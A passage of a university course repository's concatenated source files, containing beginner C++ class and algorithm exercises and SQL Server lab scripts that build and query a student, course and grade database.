p2 = new Person_2("Zhang3", 19, 'm'); //动态生成一个Person_2对象
cout << "person2: \t";
p2->ShowPerson_2();
*p2 = *p1; //对象之间的赋值
cout << "person2: \t";
p2->ShowPerson_2();
delete p1; //释放p1指针指向对象所占的空间
delete p2; //释放p2指针指向对象所占的空间
return 0;
}<file_sep>/CPlus_Source/Shiyan3/person.h
#pragma once
#include <iostream>
#include <cstring>
using namespace std;
class Person
{
private:
char m_strName[20];
int m_nAge;
int m_nSex;
public:
Person();//构造函数
Person(const char *name, int age, char sex); //构造函数
Person(const Person &p); //拷贝构造函数
~Person() //析构函数
{
cout << "Now destroying the instance of Person" << endl;
}
void SetName(char *name);
void SetAge(int age);
void setSex(char sex);
char* GetName();
int GetAge();
char GetSex();
void ShowMe();
};
<file_sep>/CPlus_Source/Chapter1/1_4_2.h
#pragma once
#include<iostream>
using namespace std;
int main_1_4_2() {
cout << "矩形的面基是:" << 78 + 42 << "平方米" << endl;
return 0;
}<file_sep>/CPlus_Source/Shiyan4/4_1.h
#pragma once
#include <iostream>
using namespace std;
class COMPLEX {
public:
COMPLEX(double r = 0, double i = 0); //构造函数
COMPLEX(const COMPLEX& other); //拷贝构造函数
void print(); //打印复数
COMPLEX operator +(const COMPLEX& other); //重载加法运算符(二元)
COMPLEX operator -(const COMPLEX& other); //重载减法运算符(二元)
COMPLEX operator -(); //重载求负运算符(一元)
COMPLEX operator =(const COMPLEX& other); //重载赋值运算符(二元)
protected:
double real, image; // 复数的实部与虚部
};
COMPLEX::COMPLEX(double r, double i)
{
real = r;
image = i;
}
COMPLEX::COMPLEX(const COMPLEX& other)
{
real = other.real;
image = other.image;
}
void COMPLEX::print()
{
cout << real;
if (image > 0)cout << "+" << image << "i";
else if (image < 0)cout << image << "i";
cout << endl;
}
COMPLEX COMPLEX::operator +(const COMPLEX& other)
{
COMPLEX temp;
temp.real = real + other.real; //real=real+other.real;
temp.image = image + other.image; //image=image+other.image;
return temp; //*this;
}
COMPLEX COMPLEX::operator -(const COMPLEX& other)
{
COMPLEX temp;
temp.real = real - other.real;
temp.image = image - other.image;
return temp;
}
COMPLEX COMPLEX::operator -()
{
COMPLEX temp;
temp.real = -real;
temp.image = -image;
return temp;
}
COMPLEX COMPLEX::operator =(const COMPLEX& other)
{
real = other.real;
image = other.image;
return *this; //返回对象值
}
int main_4_1()
{
COMPLEX c1(1, 2); // 定义一个值为1 + 2i的复数c1
COMPLEX c2(2); // 定义一个值为2的复数c2
//c2.print();
COMPLEX c3(c1); // 用COMPLEX(const COMPLEX& other)创建一个值同c1的新复数
c3.print(); // 打印c3原来的值
c1 = c1 + c2 + c3; // 将c1加上c2再加上c3赋值给c1
c2 = -c3; // c2等于c3求负
c3 = c2 - c1; // c3等于c2减去c1
c3.print(); // 再打印运算后c3的值
//cout<<sizeof(c1)<<endl;
return 0;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_1.sql
-- 实验一:
-- 先创建文件夹存放数据
CREATE DATABASE xskc
on (name=xsks_data,filename='F:\SQL_SERVER\sjksy\xskc_data.mdf')
log on (name=xskc_log,filename='F:\SQL_SERVER\sjksy\xskc_log.ldf');
--导入文件成为新建一个数据库
EXEC sp_attach_db @dbname = 'xskc',
@filename1 = 'F:\SQL_SERVER\sjksy\xskc_data.mdf',
@filename2 = 'F:\SQL_SERVER\sjksy\xskc_log.ldf'
--END导入
USE xskc;
CREATE TABLE Student(
Sno CHAR(9) PRIMARY KEY,
Sname CHAR(8) NOT NULL,
Ssex CHAR(2) DEFAULT '男' CHECK(Ssex in ('男','女')),
Sage INT,
Sdept CHAR(20)
);
CREATE TABLE Course(
Cno CHAR(4) PRIMARY KEY,
Cname CHAR(40) NOT NULL,
Cpno CHAR(4),
Ccredit INT,
FOREIGN KEY(Cpno) REFERENCES Course(Cno)
);
CREATE TABLE SC(
Sno CHAR(9),
Cno CHAR(4),
Grade INT,
PRIMARY KEY(Sno,Cno),
FOREIGN KEY(Sno) REFERENCES Student(Sno),
FOREIGN KEY(Cno) REFERENCES Course(Cno)
);
ALTER TABLE Student ADD S_entrance DATETIME;
ALTER TABLE Student ALTER COLUMN Sage SMALLINT;
ALTER TABLE Course ADD UNIQUE(Cname);
ALTER TABLE Student ALTER COLUMN Sdept CHAR(20) NOT NULL;
ALTER TABLE Student DROP COLUMN S_entrance;
-- DROP TABLE Student CASCADE; -- 注释:SQL Server 级联删除失败
-- CREATE CLUSTERED INDEX Stu_Sname ON Student(Sage); -- 注释:CLUSTERED聚簇索引,无法在同个表上建立多个聚簇索引
-- DROP INDEX PK__Student__CA1FE4647F60ED59 ON Student; -- 注释:不允许对索引 'Student.PK__Student__CA1FE4647F60ED59' 显式地使用 DROP INDEX。该索引正用于 PRIMARY KEY 约束的强制执行。
-- ALTER TABLE Student ALTER COLUMN Sno char(9) not null; -- 注释:删除主键失败
CREATE UNIQUE INDEX Stu_Sno ON Student(Sno);
CREATE UNIQUE INDEX Cou_Cno ON Course(Cno);
CREATE UNIQUE INDEX SCno ON SC(Sno ASC,Cno DESC);
-- DROP INDEX Stu_Sname ON Student; -- 注释:上面没建立聚簇索引
-- END 实验一
<file_sep>/CPlus_Source/Chapter3/3_3.h
#pragma once
#include<iostream>
#include<cmath>
using namespace std;
//三位数的水仙花数
void main_3_3() {
for (int i = 100; i < 1000; i++) {
if (pow(i / 100,3) + pow((i / 10) % 10, 3) + pow(i % 10,3) == i) {
cout << i << endl;
};
}
//cout << num << endl;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_3.sql
-- 实验三
USE xskc;
SELECT Student.*,SC.* FROM Student,SC WHERE Student.Sno=SC.Sno;
SELECT Student.Sno, Sname, Ssex, Sage, Sdept, Cno, Grade FROM Student,SC WHERE Student.Sno=SC.Sno;
SELECT A.Cno,A.Cname,B.Cpno FROM Course A, Course B -- 这样是笛卡尔积的连接,是不对的
SELECT A.Cno,A.Cname,B.Cpno FROM Course A, Course B WHERE A.Cpno=B.Cno -- 表别名
SELECT Student.Sno,Sname,Ssex,Sdept,Cno,Grade FROM Student,SC WHERE Student.Sno=SC.Sno;
SELECT Student.Sno,Sname,Ssex,Sdept,Cno,Grade FROM Student LEFT JOIN SC ON Student.Sno=SC.Sno; --这里的话lll是没有成绩的,但左漂浮在查询中了
SELECT Student.Sno,Sname,Ssex,Sdept,Cno,Grade FROM SC RIGHT JOIN Student ON Student.Sno=SC.Sno; --跟上条语句查询结果一样,是注重左右漂浮的对象
SELECT Student.Sno,Sname,Cname,Grade FROM Student,SC,Course WHERE Student.Sno=SC.Sno AND SC.Cno=Course.Cno; -- 多表查询
SELECT Sno,Sname,Sdept
FROM Student
WHERE Sdept IN
(SELECT Sdept FROM Student WHERE Sname='李勇')
SELECT Sno , Sname, Sdept
FROM Student
WHERE Sdept =
(SELECT Sdept
FROM Student
WHERE Sname='李勇');
SELECT A.Sno,A.Sname,A.Sdept FROM Student A,Student B WHERE A.Sdept=B.Sdept AND B.Sname='李勇'
SELECT Sname,Sdept
FROM Student
WHERE Sno IN
(SELECT Sno FROM SC WHERE Cno='2')
SELECT Sname,Sdept FROM Student,SC WHERE Student.Sno=SC.Sno AND SC.Cno='2'
SELECT Sno, Sname
FROM Student
WHERE Sno IN
(SELECT Sno
FROM SC
WHERE Cno IN
(SELECT Cno
FROM Course
WHERE Cname = '数据库'))
SELECT Student.Sno,Student.Sname FROM Student,SC,Course WHERE SC.Cno=Course.Cno AND Course.Cname='数据库' AND SC.Sno=Student.Sno;
INSERT INTO Student VALUES('201215153','王敏','女',10,'MA')
SELECT Sname,Sage FROM Student WHERE Sdept!='CS' AND Sage<=ALL(SELECT Sage FROM Student WHERE Sdept='CS') -- !=或者<>都是正确的
SELECT Sname,Sage FROM Student WHERE Sdept<>'CS' AND Sage <= (SELECT MIN(Sage) FROM Student WHERE Sdept='CS')
SELECT Sname,Sdept FROM Student WHERE EXISTS (SELECT * FROM SC WHERE SC.Sno=Student.Sno AND Cno='1')
SELECT Sno, Sname, Sdept FROM Student A WHERE EXISTS (SELECT * FROM Student B WHERE B.Sdept=A.Sdept AND B.Sname='李勇');
SELECT Sname,Sdept FROM Student WHERE NOT EXISTS
(SELECT * FROM Course WHERE NOT EXISTS
(SELECT * FROM SC,Student,Course WHERE SC.Sno=Student.Sno AND SC.Cno=Course.Cno) )
SELECT Sname,Sdept FROM Student WHERE NOT EXISTS (SELECT * FROM Course WHERE NOT EXISTS (SELECT * FROM SC,Student,Course WHERE SC.Sno=Student.Sno AND SC.Cno=Course.Cno))
SELECT * FROM Student WHERE Sdept='CS' UNION SELECT * FROM Student WHERE Sage <=20 --UNION是或、接下去输出查询
SELECT * FROM Student WHERE Sdept='CS' OR Sage<=20
SELECT * FROM Student WHERE Sdept='CS' AND Sage<20;
--END实验三
<file_sep>/CPlus_Source/Shiyan2/person_2.h
#pragma once
#include <iostream>
#include <cstring>
using namespace std;
class Person_2
{
private:
char m_strName[20];
int m_nAge;
int m_nSex;
public:
Person_2();//构造函数
Person_2(const char *name, int age, char sex); //构造函数
Person_2(const Person_2 &p); //拷贝构造函数
~Person_2() //析构函数
{
cout << "Now destroying the instance of Person_2" << endl;
}
void SetName(const char *name);
void SetAge(int age);
void setSex(char sex);
char* GetName();
int GetAge();
char GetSex();
void ShowPerson_2();
};
int main_person_2();<file_sep>/CPlus_Source/Chapter3/3_3_3.h
#pragma once
#include<iostream>
using namespace std;
//牛顿法求平方根
void main_3_3_3() {
const float EPSILON = 1E-5;
float num, root, pre;
cout << "请输入一个正整数:";
cin >> num;
if (num <= 0) cout << "???" << endl;
else {
root = 1;
do {
pre = root;
root = (num / root + root) / 2;
} while (pre - root > EPSILON || root - pre > EPSILON); //减法运算优先比较运算
cout << "The root of " << num << " is " << root << endl;
}
}<file_sep>/CPlus_Source/Shiyan2/person_1.cpp
#include "pch.h"
#include "Person_1.h"
using namespace std;
Person_1::Person_1() : m_nAge(0), m_nSex(0){ //构造函数
strcpy_s(m_strName, "XXX");
}
Person_1::Person_1(const char *name, int age, char sex) : m_nAge(age), m_nSex(sex == 'm' ? 0 : 1){ //构造函数
strcpy_s(m_strName, name);
}
Person_1::Person_1(const Person_1 &p) : m_nAge(p.m_nAge), m_nSex(p.m_nSex){ //拷贝构造函数
strcpy_s(m_strName, p.m_strName);
}
void Person_1::SetName(const char *name){
strcpy_s(m_strName, name);
}
void Person_1::SetAge(int age){
m_nAge = age;
}
void Person_1::setSex(char sex){
m_nSex = sex == 'm' ? 0 : 1;
}
const char* Person_1::GetName() const{
return m_strName;
}
int Person_1::GetAge() const{
return m_nAge;
}
char Person_1::GetSex() const{
return (m_nSex == 0 ? 'm' : 'f');
}
void Person_1::ShowMe() const{
cout << GetName() << '\t' << GetAge() << '\t' << GetSex() << '\t' << endl;
}
int main_person_1()
{
Person_1 *p1, *p2; //声明两个指向对象的指针
p1 = new Person_1; //动态生成一个Person_1对象
cout << "默认状态下, Person_1的三个变量: \t";
p1->ShowMe();
p1->SetAge(19); // 函数赋值
p1->SetName("张三");
p1->setSex('m');
cout << "函数调用赋值后,Person_1的三个变量: \t";
cout << p1->GetName() << "\t" << p1->GetAge() << "\t" << p1->GetSex() << endl; //函数输出
p2 = new Person_1("李四", 19, 'm'); //动态生成一个Person_1对象并用构造函数初始化
cout << "构造函数初始化,Person_2的三个变量: \t";
p2->ShowMe();
delete p1; //释放p1指针指向对象所占的空间
delete p2; //释放p2指针指向对象所占的空间
return 0;
}
<file_sep>/CPlus_Source/Shiyan4/Timeworker.h
#pragma once
#include"Person.h"
#include<iostream>
class Timeworker:public Person
{
public:
Timeworker(int id0, const char* name0, float time0); //创建Employee时候要给id、名字、time
~Timeworker();
virtual void calculation();
virtual void display();
private:
float time;
};
Timeworker::Timeworker(int id0, const char* name0, float time0)
{
id = id0;
strcpy_s(name, name0);
time = time0;
}
Timeworker::~Timeworker()
{
}
void Timeworker::calculation() {
salary = 4000 + time * 100;
}
void Timeworker::display() {
std::cout << "这个id为" << id << "名字为" << name << "的工资是:" << salary << std::endl;
}<file_sep>/README.md
# Course Code
这是大学课程的一些实验源码。
C++/SQL Code Source for Fosu University Course
佛山科学技术学院 C++/SQL 课程实验源代码
<file_sep>/CPlus_Source/Shiyan3/3_2.h
#pragma once
#include <iostream>
using namespace std;
class A
{
public:
A()
{
cout << "Constructor1_A" << x << endl;
}
A(int m) : x(m)
{
cout << "Constructor2_A" << x << endl;
}
~A()
{
cout << "Destructor_A" << x << endl;
}
private:
int x;
};
class B : public A
{
public:
B()
{
cout << "Constructor1_B" << y << endl;
}
B(int m, int n, int l) : A(m), a(n), y(l)
{
cout << "Constructor2_B" << y << endl;
}
~B()
{
cout << "Destructor_B" << y << endl;
}
private:
A a;
int y;
};
int main_3_2()
{
B b2(5, 6, 7);
return 0;
}
<file_sep>/CPlus_Source/Shiyan2/const_text.cpp
#include"pch.h"
#include"const_text.h"
void R::print()
{
cout << "In print:" << " R1 = " << R1 << endl;
}
void R::print() const
{
cout << "In print _const: " << " R1 = " << R1 << endl;
}
int main_const_text() {
const R a1;
a1.print();
R a2;
a2.print();
return 0;
}<file_sep>/CPlus_Source/Chapter1/1_4_1.h
#pragma once
#include <iostream>
using namespace std;
class ACCOUNT
{
private:
float balance; // 当前账户余额
public:
// 开设账户,初始金额为amount
ACCOUNT(float amount) {
balance = amount;
};
// 往账户中存款,金额为amount
void deposit(float amount) {
balance += amount;
};
// 从账户中取款,金额为amount
int withdraw(float amount) {
if (amount > balance) {
return 0;
}
else {
balance -= amount;
return 1;
}
};
// 查询账户余额
float get_balance() {
return balance;
};
};
// 主函数
int main_1_4_1() {
// 开设账户
ACCOUNT acc1(500);
ACCOUNT acc2(1500);
// 存款与取款
acc1.deposit(255.5);
acc2.deposit(500);
acc2.withdraw(700);
acc1.withdraw(700);
acc2.withdraw(350);
// 查询余额
cout << "acc1_balance: " << acc1.get_balance() << endl;
cout << "acc2_balance: " << acc2.get_balance() << endl;
return 0;
}
<file_sep>/CPlus_Source/Chapter3/3_2_4.h
#pragma once
#include<iostream>
using namespace std;
void main_3_2_4() {
int math, phys, chem;
int average;
float scholarship; // 奖学金
cout << "Enter scores of math, phys, and chem : ";
cin >> math >> phys >> chem;
average = (math + phys + chem) / 3 + 0.5; // +0.5做四舍五入
if (average >= 90) {
cout << "Excellent!" << endl;
scholarship = 120.00;
}
else if(average >= 60){
cout << "OK!" << endl;
scholarship = 60.00;
}
else
{
cout << "false!" << endl;
scholarship = 60.00;
}
cout << "Your scholarship is " << scholarship << endl;
}
<file_sep>/CPlus_Source/Shiyan2/this_text.h
#pragma once
#include <iostream>
using namespace std;
class Test
{
int x;
public:
Test(int = 0);
void print() const;
};
Test::Test(int a) : x(a) // constructor
{}
void Test::print() const
{
cout << "x = " << x
<< "\nthis->x = " << this->x
<< "\n(*this).x = " << (*this).x
<< "\nthis = " << this << endl;
}
int main_this_text()
{
Test testObject(12);
testObject.print();
cout << "&testObject = " << &testObject << endl;
return 0;
}
<file_sep>/CPlus_Source/Chapter3/3_3_2.h
#pragma once
#include<iostream>
using namespace std;
void main_3_3_2() {
int choice = 1;
while (choice != 0) {
std::cout << "请做出选择:" << std::endl << "1.Apple" << std::endl << "2.Banana" << std::endl << "0.Exit" << std::endl;
std::cin >> choice;
switch (choice)
{
case 0:break; // 这里退出while循环
case 1:std::cout << "You choose Apple" << std::endl; break; break; // 无论这里多少个break都不能退出while
case 2:std::cout << "You choose Banana" << std::endl; break;
default:
std::cout << "You choose what???" << std::endl;
break;
}
}
}<file_sep>/CPlus_Source/Shiyan3/person.cpp
#include"pch.h"
#include "person.h"
Person::Person() : m_nAge(0), m_nSex(0)//构造函数 这里相当于初始化赋值m_nAge=0 m_nSex=0
{
strcpy_s(m_strName, "XXX");
}
Person::Person(const char *name, int age, char sex) : m_nAge(age), m_nSex(sex == 'm' ? 0 : 1)//构造函数 男0女1 这个是成员变量初始化再见
{
strcpy_s(m_strName, name);
}
Person::Person(const Person &p) : m_nAge(p.m_nAge), m_nSex(p.m_nSex)//拷贝构造函数
{
strcpy_s(m_strName, p.m_strName);
}
void Person::SetName(char *name)
{
strcpy_s(m_strName, name);
}
void Person::SetAge(int age)
{
m_nAge = age;
}
void Person::setSex(char sex)
{
m_nSex = sex == 'm' ? 0 : 1;
}
char* Person::GetName()
{
return m_strName;
}
int Person::GetAge()
{
return m_nAge;
}
char Person::GetSex()
{
return (m_nSex == 0 ? 'm' : 'f');
}
void Person::ShowMe()
{
cout << GetName() << '\t' << GetAge() << '\t' << GetSex() << '\t';
}
<file_sep>/CPlus_Source/Shiyan3/employee.h
#pragma once
#include "person.h"
class Employee : public Person //雇员类定义
{
char m_strDept[20]; //工作部门
float m_fSalary; //月薪
public:
Employee();
Employee(const char *name, int age, char sex, const char *dept, float salary);
Employee(Employee &e);
~Employee()
{
cout << "Now destroying the instance of Employee" << endl;
}
void SetDept(const char *dept);
void SetSalary(float salary);
char* GetDept();
float GetSalary();
void ShowMe(); //显示雇员信息
};
<file_sep>/CPlus_Source/Shiyan4/4_5.cpp
#include"pch.h"
#include"4_5.h"
#include<iostream>
#include"Employee.h"
#include"Person.h"
#include"Salesman.h"
#include"Timeworker.h"
using namespace std;
void main_4_5() {
Person *p1;
Employee e(1, "employee");
Salesman s(2, "salesman", 2500);
Timeworker t(3, "timeworker", 300);
p1 = &e;
p1->calculation();
p1->display();
std::cout << "End employee!" << std::endl;
p1 = &s;
p1->calculation();
p1->display();
std::cout << "End salesman!" << std::endl;
p1 = &t;
p1->calculation();
p1->display();
std::cout << "End timeworker!" << std::endl;
}<file_sep>/CPlus_Source/Shiyan3/birthday.cpp
#include"pch.h"
#include"birthday.h"
#include<string.h>
using namespace std;
Date::Date(int y, int m, int d)
{
year = y;
month = m;
day = d;
}
void Date::display()
{
cout << "生日为" << year << "年" << month << "月" << day << "日" << endl;
}
Person::Person(char n[])
{
strcpy_s(name, n);
cout << "姓名为:" << name << endl;
}
Student::Student(int i, int s, char n[]) :Person(n)
{
id = i;
score = s;
strcpy_s(name, n);
}
void Student::display()
{
cout << "学号为" << id << " " << "成绩为" << score << endl;
}
<file_sep>/CPlus_Source/Shiyan3/main_1.cpp
#include"pch.h"
#include "employee.h"
using namespace std;
int main_1()
{
Employee emp1;
emp1.ShowMe();
Employee emp2("Zhangli", 40, 'f', "图书馆", 2000);
emp2.ShowMe();
cout << "调用基类GetName()返回值为: " << emp2.GetName() << endl;
return 0;
}
<file_sep>/CPlus_Source/Chapter6/bubble.h
#pragma once
#include<iostream>
using namespace std;
void bubble(int data[], int length) { // 数组首地址,长度
int segment; // 循环扫描数组的下标变量
int loop; // 循环扫描部分数组的下标变量
int temp; // 用于交换数据时作缓冲的临时变量
// 将数组分段,逐段讲数据冒泡排序
for (segment = 0; segment <= length - 2; segment++) {
// 将当前段(即segment到length-1)中的最小数据浮到最上
for (loop = length - 2; loop >= segment; loop--) {
if (data[loop + 1] < data[loop]) { // 从最后开始,如果更小,就移动上来一步,逐个冒泡
temp = data[loop];
data[loop] = data[loop + 1];
data[loop + 1] = temp;
}
}
}
return;
}
void main_bubble() {
const int max_nums = 8;
int data[max_nums]; //准备排序的数组
int loop; //循环扫描数组的下标变量
// 用户输入数组
//int i=0;
//while (std::cin >> data[i++]);
for (int i = 0; i < max_nums; i++) {
std::cin >> data[i];
}
// 对数组排序
bubble(data, max_nums);
// 排序后输出
for (int i = 0; i < max_nums; i++) {
std::cout << data[i] << "\t";
}
return;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_2.sql
-- 实验二
USE xskc;
-- 导入数据库文件
INSERT INTO Student VALUES('201215121','李勇','男',20,'CS')
INSERT INTO Student VALUES('201215122','刘晨','女',19,'CS')
INSERT INTO Student VALUES('201215131','刘晨2','女',19,'CS')
INSERT INTO Student VALUES('201215132','刘','女',19,'CS') --插入多几个做编码比较
INSERT INTO Student VALUES('201215141','l','女',19,'CS')
INSERT INTO Student VALUES('201215142','ll','女',19,'CS')
INSERT INTO Student VALUES('201215143','lll','女',19,'CS')
INSERT INTO Student VALUES('201215123','王敏','女',18,'MA')
INSERT INTO Student VALUES('201215125','张立','男',19,'IS')
INSERT INTO Student VALUES('201331001','欧阳原野','男',17,'CS')
INSERT INTO Student VALUES('201439002','刘小莉','女',16,'CS')
INSERT INTO Course VALUES('1','数据库','5',4) --注意在此处由于先修课须存在的约束,插入前须先置NULL
INSERT INTO Course VALUES('2','数学',NULL,2)
INSERT INTO Course VALUES('3','信息系统','1',4)
INSERT INTO Course VALUES('4','操作系统','6',3)
INSERT INTO Course VALUES('5','数据结构','7',4)
INSERT INTO Course VALUES('6','数据处理',NULL,2)
INSERT INTO Course VALUES('7','C语言',6,4)
INSERT INTO Course VALUES('8','DB_Design',1,2)
UPDATE Course SET Cpno='8' WHERE Cno='1' --修正先修课的数据
INSERT INTO SC VALUES('201215121','1',92)
INSERT INTO SC VALUES('201215121','2',85)
INSERT INTO SC VALUES('201215121','3',88)
INSERT INTO SC VALUES('201215122','2',90)
INSERT INTO SC VALUES('201215122','3',80)
INSERT INTO SC VALUES('201331001','1',55)
INSERT INTO SC VALUES('201331001','2',90)
INSERT INTO SC VALUES('201331001','3',80)
INSERT INTO SC VALUES('201439002','1',69)
INSERT INTO SC VALUES('201215125','1',NULL)
-- END 导入数据库文件
SELECT * FROM Student;
SELECT * FROM SC;
SELECT * FROM Course;
SELECT Sname,Sno,Sdept FROM Student;
SELECT Sno,Sname,2018-Sage as 'Birthday' FROM Student;
SELECT Sno,Sname,2018-Sage 'Birthday',LOWER(Sdept) Sdept FROM Student;
SELECT Sno, Sname FROM Student WHERE Sdept='MA';
SELECT DISTINCT Sno FROM SC WHERE Grade<60;
SELECT Sname, Sage FROM Student WHERE Sage<20;
SELECT Sname, Sage FROM Student WHERE Sage>=18 AND Sage<=22;
SELECT Sname, Sage FROM Student WHERE Sage BETWEEN 18 AND 22;
SELECT Sname, Sage FROM Student WHERE Sage NOT BETWEEN 18 AND 20;
SELECT Sno, Sname, Ssex FROM Student WHERE Sdept IN ('CS', 'MA', 'IS');
SELECT Sno, Sname, Ssex FROM Student WHERE Sdept='CS' OR Sdept='MA' OR Sdept='IS';
SELECT Sname, Ssex FROM Student WHERE Sdept NOT IN ('IS', 'MA', 'CS');
SELECT Sname, Sno, Ssex FROM Student WHERE Sname LIKE '刘%';
SELECT Sname, Sdept FROM Student WHERE Sname LIKE '刘___';
SELECT Sname, Sage FROM Student WHERE Sname NOT LIKE '刘%';
SELECT Cno, Ccredit FROM Course WHERE Cname LIKE 'DB\_DESIGN' ESCAPE '\';
SELECT * FROM Course WHERE Cname LIKE 'DB\_%DESIG_'ESCAPE'\'; -- 查询以"DB_"开头,且倒数字符为“DESIG(N)”的课程
SELECT Sno, Cno FROM SC WHERE Grade IS NULL;
SELECT Sno, Cno FROM SC WHERE Grade IS NOT NULL;
SELECT Sno, Grade FROM SC WHERE Cno='3' ORDER BY Grade DESC;
SELECT * FROM Student ORDER BY Sdept ASC, Sage DESC;
SELECT COUNT(*) FROM Student;
SELECT COUNT(*) count_name FROM Student;
SELECT COUNT(DISTINCT Sno) FROM SC;
SELECT AVG(Grade) FROM SC WHERE Cno='2'; --应该是88.3333..但由于是int,暂时忽略
SELECT MAX(Grade) FROM SC WHERE Cno='2';
SELECT SUM(Ccredit) FROM SC,Course WHERE Sno='201215122' AND SC.Cno=Course.Cno;
SELECT Cno , COUNT(Sno) CntSno FROM SC GROUP BY Cno;
SELECT Sno FROM SC GROUP BY Sno HAVING COUNT(Cno)>2;
--END实验二<file_sep>/CPlus_Source/Shiyan4/4_5.h
#pragma once
void main_4_5();<file_sep>/CPlus_Source/Shiyan4/Salesman.h
#pragma once
#include"Person.h"
#include<iostream>
class Salesman:public Person
{
public:
Salesman(int id0, const char* name0, float sales0); //创建Employee时候要给id、名字、销售额
~Salesman();
virtual void calculation();
virtual void display();
private:
float sales;
};
Salesman::Salesman(int id0, const char* name0, float sales0)
{
id = id0;
strcpy_s(name, name0);
sales = sales0;
}
Salesman::~Salesman()
{
}
void Salesman::calculation() {
salary = 4000 + sales * 0.04f;
}
void Salesman::display() {
std::cout << "这个id为" << id << "名字为" << name << "的工资是:" << salary << std::endl;
}
<file_sep>/CPlus_Source/Shiyan4/Shiyan4.cpp
// Shiyan4.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include "pch.h"
#include <iostream>
#include"4_1.h"
#include"4_2.h"
#include"4_3.h"
#include"cixu.h"
#include"4_5.h"
int main()
{
//std::cout << "Hello World!\n";
//main_4_1();
//main_4_2();
//main_4_3();
//main_cixu();
main_4_5();
std::cout << "20160310333黄慧琳!\n";
return 0;
}
// 运行程序: Ctrl + F5 或调试 >“开始执行(不调试)”菜单
// 调试程序: F5 或调试 >“开始调试”菜单
// 入门提示:
// 1. 使用解决方案资源管理器窗口添加/管理文件
// 2. 使用团队资源管理器窗口连接到源代码管理
// 3. 使用输出窗口查看生成输出和其他消息
// 4. 使用错误列表窗口查看错误
// 5. 转到“项目”>“添加新项”以创建新的代码文件,或转到“项目”>“添加现有项”以将现有代码文件添加到项目
// 6. 将来,若要再次打开此项目,请转到“文件”>“打开”>“项目”并选择 .sln 文件
<file_sep>/CPlus_Source/Chapter4/4_2.h
#pragma once
#include<iostream>
using namespace std;
bool is_run_year(int year) {
if (year % 100 == 0) {
if (year % 400 == 0) {
return 1;
};
}
else
{
if (year % 4 == 0) {
return 1;
};
}
return 0;
}
int month_days(int year, int month) {
switch (month)
{
case 1:return 31;
case 2:
if (is_run_year(year)) {
return 29;
}
else
{
return 28;
};
case 3:return 31;
case 4:return 30;
case 5:return 31;
case 6:return 30;
case 7:return 31;
case 8:return 31;
case 9:return 30;
case 10:return 31;
case 11:return 30;
case 12:return 31;
default:
cout << "???" << endl << "!" << endl;
break;
}
}
void main_4_2() {
int year, month, day, sum = 0;
cout << "year month day : ";
cin >> year >> month >> day;
//cout << day;
//cout << ( 0< day < 0); //³ö´í£¡£¡£¡
if ( 999 < year && year < 10000 && 0 < month && month < 13 ) {
for (int i = 1; i < month; i++) {
sum += month_days(year, i);
}
if (day > month_days(year, month)) {
cout << "???";
return;
}
sum += day;
cout << "days: " << sum << endl;
}
else {
cout << "???";
};
return;
}<file_sep>/CPlus_Source/Shiyan1/yuan.h
#pragma once
#include<iostream>
using namespace std;
int main_yuan(){
double r, C, S;
const double PI = 3.14;
cout << "学号:20160310321\t" << "学生:林上满" << endl;
cout << "请输入圆的半径(圆周率取3.14):";
cin >> r;
C = 2 * PI * r; //计算周长
S = PI * r * r; //计算面积
cout << "圆->周长为:" << C << endl;
cout << "圆->面积为:" << S << endl;
return 0;
}
<file_sep>/CPlus_Source/Shiyan3/birthday.h
#pragma once
#include<iostream>
class Date {
public:
Date(int y, int m, int d);
void display();
protected:
int year, month, day;
};
class Person {
public:
Person(char n[]);
protected:
char name[50];
};
class Student :public Person {
public:
Student(int i, int s, char n[]);
void display();
protected:
int id, score;
};
<file_sep>/CPlus_Source/Shiyan3/employee.cpp
#include"pch.h"
#include "employee.h"
Employee::Employee() : m_fSalary(0.0)
{
strcpy_s(m_strDept, "xxxx");
}
Employee::Employee(const char *name, int age, char sex, const char *dept, float salary)
: Person(name, age, sex), m_fSalary(salary)
{
strcpy_s(m_strDept, dept);
}
Employee::Employee(Employee &e) : Person(e.GetName(), e.GetAge(), e.GetSex()),
m_fSalary(e.m_fSalary)
{
strcpy_s(m_strDept, e.m_strDept);
}
void Employee::SetDept(const char *dept)
{
strcpy_s(m_strDept, dept);
}
void Employee::SetSalary(float salary)
{
m_fSalary = salary;
}
char* Employee::GetDept()
{
return m_strDept;
}
float Employee::GetSalary()
{
return m_fSalary;
}
void Employee::ShowMe()
{
Person::ShowMe();
cout << m_strDept << "\t" << m_fSalary << endl;
}
<file_sep>/CPlus_Source/README.md
# CPlus_Source
Fosu University Course C++ Code Source
佛山科学技术学院 C++课程实验源代码
# How to use
Get this repo and import `CPlus_Source.sln` into vs C++
<file_sep>/CPlus_Source/Shiyan1/ju.h
#pragma once
#include<iostream>
using namespace std;
int main_ju(){
double l, w, S;
cout << "学号:20160310321\t" << "学生:林上满" << endl;
cout << "请输入矩形的长和宽(请用空格分开):";
cin >> l >> w;
S = l * w; //计算面积
cout << "矩形的面积为:" << S << endl;
return 0;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_5.sql
use xskc
CREATE VIEW C_Student AS SELECT Sno,Sname,Sage,Sdept FROM Student WHERE Sdept='MA' WITH CHECK OPTION;
CREATE VIEW Student_CR AS SELECT Student.Sno,Sname,Cname,Grade FROM Student,Course,SC WHERE Student.Sno=SC.Sno AND SC.Cno=Course.Cno
CREATE VIEW Student_birth(Sno,Sname,Sbirth) AS SELECT Sno,Sname,2018-Sage FROM Student
SELECT * FROM Student_birth
SELECT * FROM Student WHERE Sdept='MA'
SELECT * FROM C_Student
SELECT Sname,Sage FROM C_Student WHERE Sage <20
SELECT Sname,Sage FROM Student WHERE Sdept='MA' AND Sage<20
SELECT * FROM Student_CR
SELECT Sno,Sname,Cname FROM Student_CR WHERE Grade>85
UPDATE C_Student SET Sname='黄海' WHERE Sno='201215153'
INSERT INTO C_Student VALUES('200215124','王海',20,'MA')
SELECT * FROM C_Student
SELECT * FROM Student
DELETE FROM C_Student WHERE Sno='200215124'
--END实验五
<file_sep>/CPlus_Source/Shiyan2/person_1.h
#pragma once
#include <iostream>
#include <cstring>
using namespace std;
class Person_1{
private:
char m_strName[20];
int m_nAge;
int m_nSex;
public:
Person_1();//构造函数
Person_1(const char *name, int age, char sex); // 构造函数
Person_1(const Person_1 &p); // 拷贝构造函数
~Person_1() // 析构函数
{
cout << "Now destroying the instance of Person_1" << endl;
}
void SetName(const char *name);
